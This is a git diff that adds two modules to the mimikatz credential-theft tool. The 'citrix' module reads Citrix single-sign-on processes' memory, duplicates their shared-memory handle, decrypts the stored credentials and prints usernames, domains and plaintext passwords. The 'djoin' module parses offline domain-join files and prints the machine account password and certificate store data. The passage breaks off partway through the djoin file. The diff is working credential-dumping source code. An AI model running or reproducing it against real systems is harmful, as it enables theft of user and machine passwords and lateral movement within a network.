diff --git a/inc/globals.h b/inc/globals.h
index d3aa24a..b124b88 100755
--- a/inc/globals.h
+++ b/inc/globals.h
@@ -129,3 +129,18 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
#define KULL_M_WIN_MIN_BUILD_BLUE 9400
#define KULL_M_WIN_MIN_BUILD_10 9800
#define KULL_M_WIN_MIN_BUILD_11 22000
+
+/* mimikatz 3 transition */
+#define GET_CLI_ARG(name, var) (kull_m_string_args_byName(argc, argv, name, var, NULL))
+#define GET_CLI_ARG_DEF(name, var, def) (kull_m_string_args_byName(argc, argv, name, var, def))
+#define GET_CLI_ARG_PRESENT(name) (kull_m_string_args_byName(argc, argv, name, NULL, NULL))
+
+#define kprintf_level(subject, ...) kprintf(L"%*s" subject, level << 1, L"", __VA_ARGS__)
+
+#define kprinthex(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 0); kprintf(L"\n")
+#define kprinthex16(lpData, cbData) kull_m_string_wprintf_hex(lpData, (DWORD) cbData, 1 | (16 << 16)); kprintf(L"\n")
+
+#define kull_m_cli_guid(pGuid, bNewLine) kull_m_string_displayGUID(pGuid); if(bNewLine) kprintf(L"\n")
+#define kull_m_cli_sid(pSid, bNewLine) kull_m_string_displaySID(pSid); if(bNewLine) kprintf(L"\n")
+
+#define kull_m_crypto_Base64StringToBinary kull_m_string_quick_base64_to_Binary
\ No newline at end of file
diff --git a/mimikatz/mimikatz.vcxproj b/mimikatz/mimikatz.vcxproj
index 1fff23d..b5d29f7 100644
--- a/mimikatz/mimikatz.vcxproj
+++ b/mimikatz/mimikatz.vcxproj
@@ -153,6 +153,7 @@
+
@@ -213,6 +214,8 @@
+
+
@@ -273,6 +276,7 @@
+
@@ -331,6 +335,8 @@
+
+
diff --git a/mimikatz/mimikatz.vcxproj.filters b/mimikatz/mimikatz.vcxproj.filters
index 0551987..ea22f09 100644
--- a/mimikatz/mimikatz.vcxproj.filters
+++ b/mimikatz/mimikatz.vcxproj.filters
@@ -332,6 +332,15 @@
local modules\dpapi\packages
+
+ common modules\rpc
+
+
+ local modules\misc
+
+
+ local modules\misc
+
@@ -683,6 +692,15 @@
local modules\dpapi\packages
+
+ common modules\rpc
+
+
+ local modules\misc
+
+
+ local modules\misc
+
@@ -723,6 +741,9 @@
{5880e511-0496-4c66-95c3-39c70baac28b}
+
+ {ca3b8b78-3db9-40c8-8091-438a90e5be4e}
+
diff --git a/mimikatz/modules/kuhl_m_misc.c b/mimikatz/modules/kuhl_m_misc.c
index 49b4a8a..60c6f89 100644
--- a/mimikatz/modules/kuhl_m_misc.c
+++ b/mimikatz/modules/kuhl_m_misc.c
@@ -30,8 +30,10 @@ const KUHL_M_C kuhl_m_c_misc[] = {
{kuhl_m_misc_spooler, L"spooler", NULL},
{kuhl_m_misc_efs, L"efs", NULL},
{kuhl_m_misc_printnightmare, L"printnightmare", NULL},
- {kuhl_m_misc_sccm_accounts, L"sccm", NULL},
- {kuhl_m_misc_shadowcopies, L"shadowcopies", NULL},
+ {kuhl_m_misc_sccm_accounts, L"sccm", NULL},
+ {kuhl_m_misc_shadowcopies, L"shadowcopies", NULL},
+ {kuhl_m_misc_djoin_proxy, L"djoin", NULL},
+ {kuhl_m_misc_citrix_proxy, L"citrix", NULL},
};
const KUHL_M kuhl_m_misc = {
L"misc", L"Miscellaneous module", NULL,
@@ -2183,5 +2185,17 @@ NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[])
}
else PRINT_ERROR(L"NtOpenDirectoryObject: 0x%08x\n", status);
+ return STATUS_SUCCESS;
+}
+
+NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[])
+{
+ kuhl_m_misc_djoin(argc, argv);
+ return STATUS_SUCCESS;
+}
+
+NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[])
+{
+ kuhl_m_misc_citrix_logonpasswords(argc, argv);
return STATUS_SUCCESS;
}
\ No newline at end of file
diff --git a/mimikatz/modules/kuhl_m_misc.h b/mimikatz/modules/kuhl_m_misc.h
index 13b9604..8fd31e4 100644
--- a/mimikatz/modules/kuhl_m_misc.h
+++ b/mimikatz/modules/kuhl_m_misc.h
@@ -23,6 +23,8 @@
#include
#pragma warning(pop)
#include
+#include "misc/kuhl_m_misc_djoin.h"
+#include "misc/kuhl_m_misc_citrix.h"
const KUHL_M kuhl_m_misc;
@@ -50,6 +52,8 @@ NTSTATUS kuhl_m_misc_efs(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_printnightmare(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_sccm_accounts(int argc, wchar_t * argv[]);
NTSTATUS kuhl_m_misc_shadowcopies(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_misc_djoin_proxy(int argc, wchar_t * argv[]);
+NTSTATUS kuhl_m_misc_citrix_proxy(int argc, wchar_t * argv[]);
BOOL kuhl_m_misc_printnightmare_normalize_library(BOOL bIsPar, LPCWSTR szLibrary, LPWSTR *pszNormalizedLibrary, LPWSTR *pszShortLibrary);
BOOL kuhl_m_misc_printnightmare_FillStructure(PDRIVER_INFO_2 pInfo2, BOOL bIsX64, BOOL bIsDynamic, LPCWSTR szForce, BOOL bIsPar, handle_t hRemoteBinding);
diff --git a/mimikatz/modules/misc/kuhl_m_misc_citrix.c b/mimikatz/modules/misc/kuhl_m_misc_citrix.c
new file mode 100644
index 0000000..6041d24
--- /dev/null
+++ b/mimikatz/modules/misc/kuhl_m_misc_citrix.c
@@ -0,0 +1,168 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_misc_citrix.h"
+
+void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[])
+{
+ UNREFERENCED_PARAMETER(argc);
+ UNREFERENCED_PARAMETER(argv);
+
+ kull_m_process_getProcessInformation(Citrix_Each_SSO_Program, NULL);
+}
+
+DECLARE_CONST_UNICODE_STRING(_U_ssonsvr, L"ssonsvr.exe");
+DECLARE_CONST_UNICODE_STRING(_U_wfcrun32, L"wfcrun32.exe");
+DECLARE_CONST_UNICODE_STRING(_U_AuthManSvr, L"AuthManSvr.exe");
+const PCUNICODE_STRING _U_CITRIX_SSO_PROGRAMS[] = { &_U_ssonsvr , &_U_wfcrun32 , &_U_AuthManSvr };
+BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg)
+{
+ DWORD i, ProcessId;
+ HANDLE hProcess;
+ //PKULL_M_MEMORY_HANDLE hMemory;
+ //KULL_M_MEMORY_ADDRESS aMemory = { NULL, &hMemory };
+ RTL_USER_PROCESS_PARAMETERS UserProcessParameters;
+ KULL_M_MEMORY_ADDRESS aRemote = {NULL, NULL}, aBuffer = {&UserProcessParameters, &KULL_M_MEMORY_GLOBAL_OWN_HANDLE};
+ PEB Peb;
+
+
+ UNREFERENCED_PARAMETER(pvArg);
+
+ for (i = 0; i < ARRAYSIZE(_U_CITRIX_SSO_PROGRAMS); i++)
+ {
+ if (RtlEqualUnicodeString(_U_CITRIX_SSO_PROGRAMS[i], &pSystemProcessInformation->ImageName, TRUE))
+ {
+ ProcessId = PtrToUlong(pSystemProcessInformation->UniqueProcessId);
+ kprintf(L"\n* %wZ -- pid: %u\n", &pSystemProcessInformation->ImageName, ProcessId);
+ hProcess = OpenProcess(PROCESS_QUERY_INFORMATION | PROCESS_VM_OPERATION | PROCESS_VM_READ | PROCESS_DUP_HANDLE, FALSE, ProcessId);
+ if(hProcess)
+ {
+ if (kull_m_memory_open(KULL_M_MEMORY_TYPE_PROCESS, hProcess, &aRemote.hMemory))
+ {
+ if (kull_m_process_peb(aRemote.hMemory, &Peb, FALSE))
+ {
+ aRemote.address = Peb.ProcessParameters;
+ if (kull_m_memory_copy(&aBuffer, &aRemote, sizeof(UserProcessParameters)))
+ {
+ aRemote.address = UserProcessParameters.CommandLine.Buffer;
+ UserProcessParameters.CommandLine.Buffer = LocalAlloc(LPTR, UserProcessParameters.CommandLine.MaximumLength);
+ aBuffer.address = UserProcessParameters.CommandLine.Buffer;
+
+ if(UserProcessParameters.CommandLine.Buffer)
+ {
+ if (kull_m_memory_copy(&aBuffer, &aRemote, UserProcessParameters.CommandLine.MaximumLength))
+ {
+ Citrix_SSO_Program_args(aRemote.hMemory->pHandleProcess->hProcess, &UserProcessParameters.CommandLine);
+ }
+ LocalFree(UserProcessParameters.CommandLine.Buffer);
+ }
+ }
+ }
+ kull_m_memory_close(aRemote.hMemory);
+ }
+ CloseHandle(hProcess);
+ }
+ else PRINT_ERROR_AUTO(L"OpenProcess");
+
+ break;
+ }
+ }
+
+ return TRUE;
+}
+
+void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine)
+{
+ int i, argc;
+ LPWSTR* argv;
+ HANDLE hRemoteFileMapping = NULL;
+
+ argv = CommandLineToArgvW(puCommandLine->Buffer, &argc);
+ if (argv)
+ {
+ if (argc > 0)
+ {
+ for (i = 0; i < argc; i++)
+ {
+ if (_wcsnicmp(argv[i], L"/HTC:", 5) == 0)
+ {
+ hRemoteFileMapping = (HANDLE)(ULONG_PTR)wcstoul(argv[i] + 5, NULL, 10);
+ Citrix_SSO_Program_FileMapping(hRemoteProcess, hRemoteFileMapping);
+
+ break;
+ }
+ }
+
+ if (!hRemoteFileMapping)
+ {
+ kprintf(L" No shared memory (no SSO enabled?)\n");
+ }
+ }
+ else PRINT_ERROR(L"No command/module?");
+
+ LocalFree(argv);
+ }
+ else PRINT_ERROR_AUTO(L"CommandLineToArgvW");
+}
+
+void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping)
+{
+ HANDLE hFileMapping;
+ PCITRIX_PACKED_CREDENTIALS pCitrixPackedCredentials;
+ PCITRIX_CREDENTIALS pCitrixCredentials;
+
+ if (DuplicateHandle(hRemoteProcess, hRemoteFileMapping, GetCurrentProcess(), &hFileMapping, FILE_MAP_READ, FALSE, 0))
+ {
+ pCitrixPackedCredentials = MapViewOfFile(hFileMapping, FILE_MAP_READ, 0, 0, sizeof(CITRIX_PACKED_CREDENTIALS));
+ if (pCitrixPackedCredentials)
+ {
+ //kprintf(L"cbStruct: 0x%08x - ref: 0x%08x\ncbData : 0x%08x - ref: 0x%08x\ndwFlags : 0x%08x\n", pCitrixPackedCredentials->cbStruct, sizeof(CITRIX_PACKED_CREDENTIALS), pCitrixPackedCredentials->cbData, sizeof(CITRIX_CREDENTIALS), pCitrixPackedCredentials->dwFlags);
+ pCitrixCredentials = LocalAlloc(LPTR, sizeof(pCitrixPackedCredentials->Data));
+ if (pCitrixCredentials)
+ {
+ RtlCopyMemory(pCitrixCredentials, pCitrixPackedCredentials->Data, sizeof(pCitrixPackedCredentials->Data));
+ if (CryptUnprotectMemory(pCitrixCredentials, sizeof(pCitrixPackedCredentials->Data), CRYPTPROTECTMEMORY_CROSS_PROCESS))
+ {
+ CitrixPasswordDesobfuscate((PBYTE)pCitrixCredentials->password, pCitrixCredentials->cbPassword);
+ kprintf(L"| Username : %s\n| Domain : %s\n| Password : %.*s\n| flags/type: 0x%08x\n", pCitrixCredentials->username, pCitrixCredentials->domain, pCitrixCredentials->cbPassword, pCitrixCredentials->password, pCitrixCredentials->dwFlags);
+ }
+ else PRINT_ERROR_AUTO(L"CryptUnprotectMemory");
+
+ LocalFree(pCitrixCredentials);
+ }
+
+ UnmapViewOfFile(pCitrixPackedCredentials);
+ }
+ else PRINT_ERROR_AUTO(L"MapViewOfFile");
+
+ CloseHandle(hFileMapping);
+ }
+ else PRINT_ERROR_AUTO(L"DuplicateHandle");
+}
+
+void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData)
+{
+ DWORD i;
+ BYTE prec;
+
+ for (i = 0, prec = 0x00; i < cbData; i++)
+ {
+ pbData[i] ^= prec ^ 'C';
+ prec = pbData[i];
+ }
+}
+
+void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData)
+{
+ DWORD i;
+ BYTE prec, sprec;
+
+ for (i = 0, prec = 0x00; i < cbData; i++)
+ {
+ sprec = pbData[i];
+ pbData[i] ^= prec ^ 'C';
+ prec = sprec;
+ }
+}
\ No newline at end of file
diff --git a/mimikatz/modules/misc/kuhl_m_misc_citrix.h b/mimikatz/modules/misc/kuhl_m_misc_citrix.h
new file mode 100644
index 0000000..28b5d0e
--- /dev/null
+++ b/mimikatz/modules/misc/kuhl_m_misc_citrix.h
@@ -0,0 +1,37 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#pragma once
+#include "../kuhl_m_misc.h"
+#include "../../../modules/kull_m_memory.h"
+#include "../../../modules/kull_m_process.h"
+
+extern const KUHL_M kuhl_m_misc_citrix;
+
+#pragma pack(push, 4)
+typedef struct _CITRIX_CREDENTIALS {
+ wchar_t username[0x100];
+ wchar_t domain[0x100];
+ DWORD cbPassword;
+ wchar_t password[0x100];
+ DWORD dwFlags; // type ?
+} CITRIX_CREDENTIALS, * PCITRIX_CREDENTIALS;
+
+typedef struct _CITRIX_PACKED_CREDENTIALS {
+ DWORD cbStruct;
+ DWORD cbData;
+ DWORD dwFlags;
+ BYTE Data[SIZE_ALIGN(sizeof(CITRIX_CREDENTIALS), CRYPTPROTECTMEMORY_BLOCK_SIZE)];
+} CITRIX_PACKED_CREDENTIALS, * PCITRIX_PACKED_CREDENTIALS;
+#pragma pack(pop)
+
+void kuhl_m_misc_citrix_logonpasswords(int argc, wchar_t* argv[]);
+
+BOOL CALLBACK Citrix_Each_SSO_Program(PSYSTEM_PROCESS_INFORMATION pSystemProcessInformation, PVOID pvArg);
+void Citrix_SSO_Program_args(HANDLE hRemoteProcess, PCUNICODE_STRING puCommandLine);
+void Citrix_SSO_Program_FileMapping(HANDLE hRemoteProcess, HANDLE hRemoteFileMapping);
+
+void CitrixPasswordObfuscate(PBYTE pbData, DWORD cbData);
+void CitrixPasswordDesobfuscate(PBYTE pbData, DWORD cbData);
\ No newline at end of file
diff --git a/mimikatz/modules/misc/kuhl_m_misc_djoin.c b/mimikatz/modules/misc/kuhl_m_misc_djoin.c
new file mode 100644
index 0000000..7e14e29
--- /dev/null
+++ b/mimikatz/modules/misc/kuhl_m_misc_djoin.c
@@ -0,0 +1,363 @@
+/* Benjamin DELPY `gentilkiwi`
+ https://blog.gentilkiwi.com
+ benjamin@gentilkiwi.com
+ Licence : https://creativecommons.org/licenses/by/4.0/
+*/
+#include "kuhl_m_misc_djoin.h"
+
+void kuhl_m_misc_djoin(int argc, wchar_t* argv[])
+{
+ LPCWSTR szInput;
+ PBYTE pbData, pbDecodedData;
+ DWORD cbData, cbDecodedData;
+
+ if (GET_CLI_ARG(L"input", &szInput))
+ {
+ kprintf(L"Input : %s\nOpening : ", szInput);
+ if (kull_m_file_readData(szInput, &pbData, &cbData))
+ {
+ kprintf(L"OK\nDecoding: ");
+ if (kull_m_crypto_Base64StringToBinary((LPCWSTR)pbData, &pbDecodedData, &cbDecodedData))
+ {
+ kprintf(L"OK\n\n");
+ kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(0, cbDecodedData, pbDecodedData);
+ LocalFree(pbDecodedData);
+ }
+ LocalFree(pbData);
+ }
+ }
+ else PRINT_ERROR(L"An /input:file is needed\n");
+}
+
+void kuhl_m_misc_djoin_ODJ_PROVISION_DATA_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ PODJ_PROVISION_DATA pOdjProvisionData = NULL;
+ DWORD i;
+
+ kprintf_level(L"[ODJ_PROVISION_DATA]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeODJ_PROVISION_DATA(pBlob, cbBlob, &pOdjProvisionData))
+ {
+ level++;
+ kprintf_level(L"ulVersion: %u\n", pOdjProvisionData->ulVersion);
+ kprintf_level(L"ulcBlobs : %u\n", pOdjProvisionData->ulcBlobs);
+
+ for (i = 0; i < pOdjProvisionData->ulcBlobs; i++)
+ {
+ kprintf_level(L"[%u] Blob - ulODJFormat: %u (", i, pOdjProvisionData->pBlobs[i].ulODJFormat);
+ switch (pOdjProvisionData->pBlobs[i].ulODJFormat)
+ {
+ case ODJ_WIN7_FORMAT:
+ kprintf(L"windows 7)\n");
+ kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(level + 1, pOdjProvisionData->pBlobs[i].cbBlob, pOdjProvisionData->pBlobs[i].pBlob);
+ break;
+
+ case ODJ_WIN8_FORMAT:
+ kprintf(L"windows 8)\n");
+ kuhl_m_misc_djoin_OP_PACKAGE_descr(level + 1, pOdjProvisionData->pBlobs[i].cbBlob, pOdjProvisionData->pBlobs[i].pBlob);
+ break;
+ default:
+ kprintf(L"?)\n");
+ kprinthex16(pOdjProvisionData->pBlobs[i].pBlob, pOdjProvisionData->pBlobs[i].cbBlob);
+ }
+ }
+
+ kull_m_rpc_FreeODJ_PROVISION_DATA(&pOdjProvisionData);
+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ PODJ_WIN7BLOB pOdjWin7Blob = NULL;
+
+ kprintf_level(L"[ODJ_WIN7BLOB]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeODJ_WIN7BLOB(pBlob, cbBlob, &pOdjWin7Blob))
+ {
+ level++;
+ kprintf_level(L"lpDomain : %s\n", pOdjWin7Blob->lpDomain);
+ kprintf_level(L"lpMachineName : %s\n", pOdjWin7Blob->lpMachineName);
+ kprintf_level(L"lpMachinePassword: %s\n", pOdjWin7Blob->lpMachinePassword);
+ kprintf_level(L"DnsDomainInfo\n");
+ kprintf_level(L" Name : %wZ\n", &pOdjWin7Blob->DnsDomainInfo.Name);
+ kprintf_level(L" DnsDomainName: %wZ\n", &pOdjWin7Blob->DnsDomainInfo.DnsDomainName);
+ kprintf_level(L" DnsForestName: %wZ\n", &pOdjWin7Blob->DnsDomainInfo.DnsForestName);
+ kprintf_level(L" DomainGuid : ");
+ kull_m_cli_guid(&pOdjWin7Blob->DnsDomainInfo.DomainGuid, TRUE);
+ kprintf_level(L" Sid : ");
+ kull_m_cli_sid(pOdjWin7Blob->DnsDomainInfo.Sid, TRUE);
+ kprintf_level(L"DcInfo\n");
+ kprintf_level(L" DomainControllerName : %s\n", pOdjWin7Blob->DcInfo.DomainControllerName);
+ kprintf_level(L" DomainControllerAddress: %s (DomainControllerAddressType: %u)\n", pOdjWin7Blob->DcInfo.DomainControllerAddress, pOdjWin7Blob->DcInfo.DomainControllerAddressType);
+ kprintf_level(L" DomainGuid : ");
+ kull_m_cli_guid(&pOdjWin7Blob->DcInfo.DomainGuid, TRUE);
+ kprintf_level(L" DomainName : %s\n", pOdjWin7Blob->DcInfo.DomainName);
+ kprintf_level(L" ForestName : %s\n", pOdjWin7Blob->DcInfo.DnsForestName);
+ kprintf_level(L" Flags : 0x%08x\n", pOdjWin7Blob->DcInfo.Flags);
+ kprintf_level(L" DcSiteName : %s\n", pOdjWin7Blob->DcInfo.DcSiteName);
+ kprintf_level(L" ClientSiteName : %s\n", pOdjWin7Blob->DcInfo.ClientSiteName);
+ kprintf_level(L"Options : 0x%08x\n", pOdjWin7Blob->Options);
+
+ kull_m_rpc_FreeODJ_WIN7BLOB(&pOdjWin7Blob);
+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_OP_PACKAGE_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ POP_PACKAGE pOpPackage = NULL;
+
+ kprintf_level(L"[OP_PACKAGE]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeOP_PACKAGE(pBlob, cbBlob, &pOpPackage))
+ {
+ level++;
+ kprintf_level(L"EncryptionType : ");
+ kull_m_cli_guid(&pOpPackage->EncryptionType, TRUE);
+ kprintf_level(L"EncryptionContext : 0x%p (%u)\n", pOpPackage->EncryptionContext.pBlob, pOpPackage->EncryptionContext.cbBlob);
+ kprintf_level(L"WrappedPartCollection :\n");
+ kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(level + 1, pOpPackage->WrappedPartCollection.cbBlob, pOpPackage->WrappedPartCollection.pBlob);
+ kprintf_level(L"cbDecryptedPartCollection: %u\n", pOpPackage->cbDecryptedPartCollection);
+ kprintf_level(L"Extension : 0x%p (%u)\n", pOpPackage->Extension.pBlob, pOpPackage->Extension.cbBlob);
+
+ kull_m_rpc_FreeOP_PACKAGE(&pOpPackage);
+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_OP_PACKAGE_PART_COLLECTION_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ POP_PACKAGE_PART_COLLECTION pOpPackagePartCollection = NULL;
+ DWORD i;
+
+ kprintf_level(L"[OP_PACKAGE_PART_COLLECTION]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeOP_PACKAGE_PART_COLLECTION(pBlob, cbBlob, &pOpPackagePartCollection))
+ {
+ level++;
+ kprintf_level(L"cParts : %u\n", pOpPackagePartCollection->cParts);
+ for (i = 0; i < pOpPackagePartCollection->cParts; i++)
+ {
+ kprintf_level(L"[%u] Blob\n", i);
+ kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(level + 1, pOpPackagePartCollection->pParts + i);
+ }
+ kprintf_level(L"Extension: 0x%p (%u)\n", pOpPackagePartCollection->Extension.pBlob, pOpPackagePartCollection->Extension.cbBlob);
+
+ kull_m_rpc_FreeOP_PACKAGE_PART_COLLECTION(&pOpPackagePartCollection);
+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_OP_PACKAGE_PART_descr(DWORD level, POP_PACKAGE_PART pOpPackagePart)
+{
+ kprintf_level(L"[OP_PACKAGE_PART]\n");
+ level++;
+ kprintf_level(L"PartType : ");
+ kull_m_cli_guid(&pOpPackagePart->PartType, FALSE);
+
+ if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER))
+ {
+ kprintf(L" - JOIN_PROVIDER\n");
+ kuhl_m_misc_djoin_ODJ_WIN7BLOB_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
+ }
+ else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER2))
+ {
+ kprintf(L" - JOIN_PROVIDER2\n");
+ kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
+ }
+ else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_JOIN_PROVIDER3))
+ {
+ kprintf(L" - JOIN_PROVIDER3\n");
+ kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
+ }
+ else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_CERT_PROVIDER))
+ {
+ kprintf(L" - CERT_PROVIDER\n");
+ kuhl_m_misc_djoin_OP_CERT_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
+ }
+ else if (RtlEqualGuid(&pOpPackagePart->PartType, &GUID_POLICY_PROVIDER))
+ {
+ kprintf(L" - POLICY_PROVIDER\n");
+ kuhl_m_misc_djoin_OP_POLICY_PART_descr(level + 1, pOpPackagePart->Part.cbBlob, pOpPackagePart->Part.pBlob);
+ }
+ else
+ {
+ kprintf(L" - ?\n");
+ kprinthex16(pOpPackagePart->Part.pBlob, pOpPackagePart->Part.cbBlob);
+ }
+
+ kprintf_level(L"ulFlags : 0x%08x\n", pOpPackagePart->ulFlags);
+ kprintf_level(L"Extension: 0x%p (%u)\n", pOpPackagePart->Extension.pBlob, pOpPackagePart->Extension.cbBlob);
+}
+
+void kuhl_m_misc_djoin_OP_JOINPROV2_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ POP_JOINPROV2_PART pOpJoinProv2Part = NULL;
+
+ kprintf_level(L"[OP_JOINPROV2_PART]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeOP_JOINPROV2_PART(pBlob, cbBlob, &pOpJoinProv2Part))
+ {
+ level++;
+ kprintf_level(L"dwFlags : 0x%08x\n", pOpJoinProv2Part->dwFlags);
+ kprintf_level(L"lpNetbiosName : %s\n", pOpJoinProv2Part->lpNetbiosName);
+ kprintf_level(L"lpSiteName : %s\n", pOpJoinProv2Part->lpSiteName);
+ kprintf_level(L"lpPrimaryDNSDomain: %s\n", pOpJoinProv2Part->lpPrimaryDNSDomain);
+ kprintf_level(L"dwReserved : 0x%08x\n", pOpJoinProv2Part->dwReserved);
+ kprintf_level(L"lpReserved : %s\n", pOpJoinProv2Part->lpReserved);
+
+ kull_m_rpc_FreeOP_JOINPROV2_PART(&pOpJoinProv2Part);
+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_OP_JOINPROV3_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ POP_JOINPROV3_PART pOpJoinProv3Part = NULL;
+
+ kprintf_level(L"[OP_JOINPROV3_PART]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeOP_JOINPROV3_PART(pBlob, cbBlob, &pOpJoinProv3Part))
+ {
+ level++;
+ kprintf_level(L"Rid : %u\n", pOpJoinProv3Part->Rid);
+ kprintf_level(L"lpSid: %s\n", pOpJoinProv3Part->lpSid);
+
+ kull_m_rpc_FreeOP_JOINPROV3_PART(&pOpJoinProv3Part);
+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_OP_CERT_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ POP_CERT_PART pOpCertPart = NULL;
+ DWORD i;
+
+ kprintf_level(L"[OP_CERT_PART]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeOP_CERT_PART(pBlob, cbBlob, &pOpCertPart))
+ {
+ level++;
+ kprintf_level(L"cPfxStores: %u\n", pOpCertPart->cPfxStores);
+ for (i = 0; i < pOpCertPart->cPfxStores; i++)
+ {
+ kprintf_level(L"[%u] PfxStore\n", i);
+ kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(level + 1, pOpCertPart->pPfxStores + i);
+ }
+ kprintf_level(L"cSstStores: %u\n", pOpCertPart->cSstStores);
+ for (i = 0; i < pOpCertPart->cSstStores; i++)
+ {
+ kprintf_level(L"[%u] SstStore\n", i);
+ kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(level + 1, pOpCertPart->pSstStores + i);
+ }
+ kprintf_level(L"Extension: 0x%p (%u)\n", pOpCertPart->Extension.pBlob, pOpCertPart->Extension.cbBlob);
+
+ kull_m_rpc_FreeOP_CERT_PART(&pOpCertPart);
+ }
+ }
+ else kprintf(L" \n");
+}
+
+void kuhl_m_misc_djoin_OP_CERT_PFX_STORE_descr(DWORD level, POP_CERT_PFX_STORE pPfxStore)
+{
+ kprintf_level(L"[OP_CERT_PFX_STORE]\n");
+ level++;
+ kprintf_level(L"pTemplateName : %s\n", pPfxStore->pTemplateName);
+ kprintf_level(L"ulPrivateKeyExportPolicy: 0x%08x\n", pPfxStore->ulPrivateKeyExportPolicy);
+ kprintf_level(L"pPolicyServerUrl : %s\n", pPfxStore->pPolicyServerUrl);
+ kprintf_level(L"ulPolicyServerUrlFlags : 0x%08x\n", pPfxStore->ulPolicyServerUrlFlags);
+ kprintf_level(L"pPolicyServerId : %s\n", pPfxStore->pPolicyServerId);
+ kprintf_level(L"pfx : %p (%u)\n", pPfxStore->pPfx, pPfxStore->cbPfx);
+}
+
+void kuhl_m_misc_djoin_OP_CERT_SST_STORE_descr(DWORD level, POP_CERT_SST_STORE pSstStore)
+{
+ kprintf_level(L"[OP_CERT_SST_STORE]\n");
+ level++;
+ kprintf_level(L"StoreLocation: 0x%08x (%s)\n", pSstStore->StoreLocation, kull_m_crypto_system_store_to_name(pSstStore->StoreLocation));
+ kprintf_level(L"pStoreName : %s\n", pSstStore->pStoreName);
+ kprintf_level(L"sst : %p (%u)\n", pSstStore->pSst, pSstStore->cbSst);
+}
+
+void kuhl_m_misc_djoin_OP_POLICY_PART_descr(DWORD level, ULONG cbBlob, PBYTE pBlob)
+{
+ POP_POLICY_PART pOpPolicyPart = NULL;
+ DWORD i;
+
+ kprintf_level(L"[OP_POLICY_PART]");
+ if (cbBlob && pBlob)
+ {
+ kprintf(L"\n");
+ if (kull_m_rpc_DecodeOP_POLICY_PART(pBlob, cbBlob, &pOpPolicyPart))
+ {
+ level++;
+ kprintf_level(L"cElementLists: %u\n", pOpPolicyPart->cElementLists);
+ for (i = 0; i < pOpPolicyPart->cElementLists; i++)
+ {
+ kprintf_level(L"[%u] ElementsList\n", i);
+ kuhl_m_misc_djoin_OP_POLICY_ELEMENT_LIST_descr(level + 1, pOpPolicyPart->pElementLists + i);
+ }
+ kprintf_level(L"Extension : 0x%p (%u)\n", pOpPolicyPart->Extension.pBlob, pOpPolicyPart->Extension.cbBlob);
+ kull_m_rpc_FreeOP_POLICY_PART(&pOpPolicyPart);
